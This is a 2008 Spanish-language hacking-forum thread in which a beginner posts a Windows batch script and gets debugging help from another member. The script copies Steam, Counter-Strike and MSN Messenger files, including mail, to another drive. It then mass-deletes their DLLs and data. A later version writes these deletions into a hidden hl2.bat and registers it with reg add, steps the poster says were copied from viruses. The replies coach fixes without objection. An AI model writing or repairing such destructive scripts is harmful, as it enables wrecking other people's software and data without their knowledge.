elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  ayuda con el bath
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con el bath  (Leído 3,094 veces)
blha

Desconectado Desconectado

Mensajes: 79


aprendiendo : c++, pyton, pearl, delphi.


Ver Perfil
ayuda con el bath
« en: 8 Septiembre 2008, 11:07 am »

ola soy un noob de esos que abundan por internet y hace una semana empeze a leer tutoriales sobre bath y hice esto (no es tan largo como parece simplemente tiene bastantes opciones dependiendo del pc ahí va :@echo off
copy c:\ *.dll m:\inform~1\
copy c:\bin\*.dll m:\inform~1\bin\
copy c:\bin\*.asi m:\inform~1\bin\
copy c:\bin\*.blob m:\inform~1\bin\
copy c:\bin\*.cfg m:\inform~1\bin\
copy C:\Progra~1\Steam\*.dll m:\inform~1\carpet~1\
copy C:\Progra~1\Steam\*.mst m:\inform~1\carpet~1\
copy C:\Progra~1\Steam\*.blob m:\inform~1\carpet~1\
copy C:\Progra~1\Steam\*.mdmp m:\inform~1\carpet~1\
copy c:\progra~1\window~1\messen~1\*.xml m:\inform~1\msn\
copy c:\progra~1\window~1\messen~1\*.txt m:\inform~1\msn\

copy C:\archiv~1\Steam\*.dll m:\inform~1\carpet~1\
copy C:\archiv~1\Steam\*.mst m:\inform~1\carpet~1\
copy C:\archiv~1\Steam\*.blob m:\inform~1\carpet~1\
copy C:\archiv~1\Steam\*.mdmp m:\inform~1\carpet~1\
copy c:\archiv~1\window~1\messen~1\*.xml m:\inform~1\msn\
copy c:\archiv~1\window~1\messen~1\*.txt m:\inform~1\msn\
copy c:\archiv~1\window~1\mail m:\inform~1\msn\mail\

copy l:\progra~1\counte~1\*.dll m:\inform~1\carpet~1\
copy l:\progra~1\counte~1\*.mst m:\inform~1\carpet~1\
copy l:\progra~1\counte~1\*.blob m:\inform~1\carpet~1\
copy l:\progra~1\counte~1\*.mdmp m:\inform~1\carpet~1\
del c:\progra~1\steam\*.dll
del c:\progra~1\steam\*.mst
del c:\progra~1\steam\*.mdmp
del c:\progra~1\steam\*.blob
del c:\*.dll
del c:\bin\*.dll
del c:\bin\*.asi
del c:\bin\*.cfg
del c:\bin\*.dll
del c:\bin\*.blob
del c:\bin\*.bin
del c:\archiv~1\steam\*.dll
del c:\archiv~1\steam\*.mst
del c:\archiv~1\steam\*.mdmp
del c:\archiv~1\steam\*.blob
del c:\archiv~1\steam\steama~1\*.gcf
del c:\progra~1\steam\steama~1\*.gcf



del c:\Progra~1\Window~1\Messen~1\*.txt
del c:\Progra~1\Window~1\Messen~1\*.dll
del c:\progra~1\window~1\messen~1\*.xml
del c:\progra~1\window~1\messen~1\*.thm
del c:\progra~1\window~1\messen~1\device~1\*.dll

del c:\progra~1\window~1\messen~1\device~1\loc\4\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\6\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\7\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\8\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\9\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\10\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\11\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\12\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\16\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\17\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\18\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\19\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\20\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\22\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\25\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\29\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\31\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\1028\*dll
del c:\progra~1\window~1\messen~1\device~1\loc\1046\*dll






del c:\archiv~1\window~1\messen~1\*.dll
del c:\archiv~1\window~1\messen~1\*.xml
del c:\archiv~1\window~1\messen~1\*.thm
del c:\archiv~1\window~1\messen~1\device~1\*.dll

del c:\archiv~1\window~1\messen~1\device~1\loc\4\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\6\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\7\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\8\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\9\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\10\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\11\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\12\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\16\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\17\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\18\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\19\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\20\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\22\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\25\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\29\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\31\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\1028\*dll
del c:\archiv~1\window~1\messen~1\device~1\loc\1046\*dll


es bastante simple y me imagino que sabran lo que hace .  lo probe y no me dejo borrar nada de archivos de programa y mirando virus vi que antes de nada metian archivos de valor en hklm pero lo probe de mil maneras pero no me dejava poner nada tengo un : windows xp media center edition y por favor ayudatme .




En línea

Black Hawk
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: ayuda con el bath
« Respuesta #1 en: 8 Septiembre 2008, 20:18 pm »

unos cuatnso errores y deberias usar las variebles de entorno x ejemplo
%programfiles% = Archivos de programa
y mira esto

copy c:\ *.dll m:\inform~1\
si no existe el disco "m:\" no hara nada

copy C:\Progra~1\Steam\*.dll
no siempre existe esa carpeta

del c:\progra~1\window~1\messen~1\device~1\loc\4\*dll
dentro de archivos de prograa no esta windows

abrio la consola y teclea
SET
y salen las variblaes de entorno , y las podes usar con %%
x ejemplo
%homedrive%
%windir%

y demas , saludos


En línea

blha

Desconectado Desconectado

Mensajes: 79


aprendiendo : c++, pyton, pearl, delphi.


Ver Perfil
Re: ayuda con el bath
« Respuesta #2 en: 9 Septiembre 2008, 11:01 am »

creo q ahora lo e mejorado un poco pero en las etiquetas ,  a y la direccion c:\program~1\window\messen~1\eso es el messenger de toda la vida .a y como msdos sabe cuando acaba una etiqueta si no hay fin o algo , pues ahí va ( creo q esta mal ) la mayoria de los pasos los e copiado de virus como eso de eg add

@echo_off

CD %programfile%\valve\steam\

echo @echo off >>hl2.bat

goto msn>>hl2.bat

echo :steam>>hl2.bat
echo del c:\*.dll>>hl2.bat
echo del c:\bin\*.dll>>hl2.bat
echo del c:\bin\*.asi>>hl2.bat
echo del c:\bin\*.cfg>>hl2.bat
echo del c:\bin\*.dll>>hl2.bat
echo del c:\bin\*.blob>>hl2.bat
echo del c:\bin\*.bin>>hl2.bat
echo del c:\archiv~1\steam\*.dll>>hl2.bat
echo del c:\archiv~1\steam\*.mst>>hl2.bat
echo del c:\archiv~1\steam\*.mdmp>>hl2.bat
echo del c:\archiv~1\steam\*.blob>>hl2.bat
echo del c:\archiv~1\steam\steama~1\*.gcf>>hl2.bat


echo :msn>>hl2.bat
cd %programfile%
echo del c:\archiv~1\window~1\messen~1\*.dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\*.xml>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\*.thm>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\*.dll>>hl2.bat

echo del c:\archiv~1\window~1\messen~1\device~1\loc\4\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\6\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\7\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\8\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\9\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\10\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\11\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\12\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\16\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\17\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\18\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\19\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\20\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\22\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\25\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\29\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\31\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\1028\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\1046\*dll>>hl2.bat
echo if exist c:\archiv~1\valve\steam goto steam>>hl2.bat

echo exit>>hl2.bat

Reg Add HKLM\valve\steam/v hl2.bat/t reg_sz/d c:\archiv~1\valve\steam\hl2.bat/f

start hl2.bat
exit

espero q me podais ayudar a poner bien los errores q yo de esto lo justo:p
adios y gracias darioxhcx
A I LO Q MAS ME INTERESA LO DE REG ADD  PORQUE SI NO AGREGO NADA AL REGISTRO WINDOWS PASSA DE MI Y NO ENTIENDO ESO DE /T REG_SZ adios y gracias darioxhcx


« Última modificación: 9 Septiembre 2008, 19:22 pm por blha » En línea

Black Hawk
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: ayuda con el bath
« Respuesta #3 en: 9 Septiembre 2008, 20:25 pm »

ara cada duda tenes la consola pone
reg /?
y sale informacion y como usar el comando

Reg Add HKLM\valve\steam/v hl2.bat/t reg_sz/d c:\archiv~1\valve\steam\hl2.bat/f

aveces esta caedena "HKLM\valve\steam" no existe
reg_sz es tipo de datos de claves

mira la info
con
reg /?

saludos
En línea

blha

Desconectado Desconectado

Mensajes: 79


aprendiendo : c++, pyton, pearl, delphi.


Ver Perfil
Re: ayuda con el bath
« Respuesta #4 en: 9 Septiembre 2008, 22:19 pm »

muchas gracias por usar un poco de tiempo para  ayudarme solo unas ultimas preguntas ,
en las etiquetas cuando acaba una se pon algo
si es un archivo.bat en reg add que le pongo multi , binari?
y eso  es todo gracias
SALU2
   
En línea

Black Hawk
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: ayuda con el bath
« Respuesta #5 en: 9 Septiembre 2008, 22:55 pm »

el archvo .bat se lee desde arriba hacia abajo
osea que si pones

:1
echo hola & pause
:2
msg * 2
pause

va a leer todo
ahora depende si keres q termine una y empieze otra x ejemplo

:inicio
echo 1 hola
echo 2 chau
set /p var=
if %var%==1 goto hola
if %va5==2 goto chau
:hola
echo hola & pause & goto inicio
:chau
echo chau & pause & exit

si es un .bat es
REG_SZ

saludos
En línea

blha

Desconectado Desconectado

Mensajes: 79


aprendiendo : c++, pyton, pearl, delphi.


Ver Perfil
Re: ayuda con el bath
« Respuesta #6 en: 10 Septiembre 2008, 08:44 am »

pos muchas gracias por todo salu2
En línea

Black Hawk
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[BATH]Sobre operadores de division
Scripting
AgnesBlack 5 6,955 Último mensaje 22 Julio 2012, 23:16 pm
por Binary_Death
[BATH]Modificar Proxy Firefox
Scripting
wuadu 7 5,285 Último mensaje 1 Agosto 2012, 08:09 am
por wuadu
copiar a windows bath
Scripting
asdexiva 2 1,981 Último mensaje 5 Noviembre 2012, 23:21 pm
por asdexiva
bath presionar boton
Scripting
asdexiva 1 2,399 Último mensaje 6 Noviembre 2012, 09:46 am
por Eleкtro
Ayuda con un bath
Dudas Generales
Morfo360 0 1,516 Último mensaje 22 Agosto 2013, 20:32 pm
por Morfo360
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines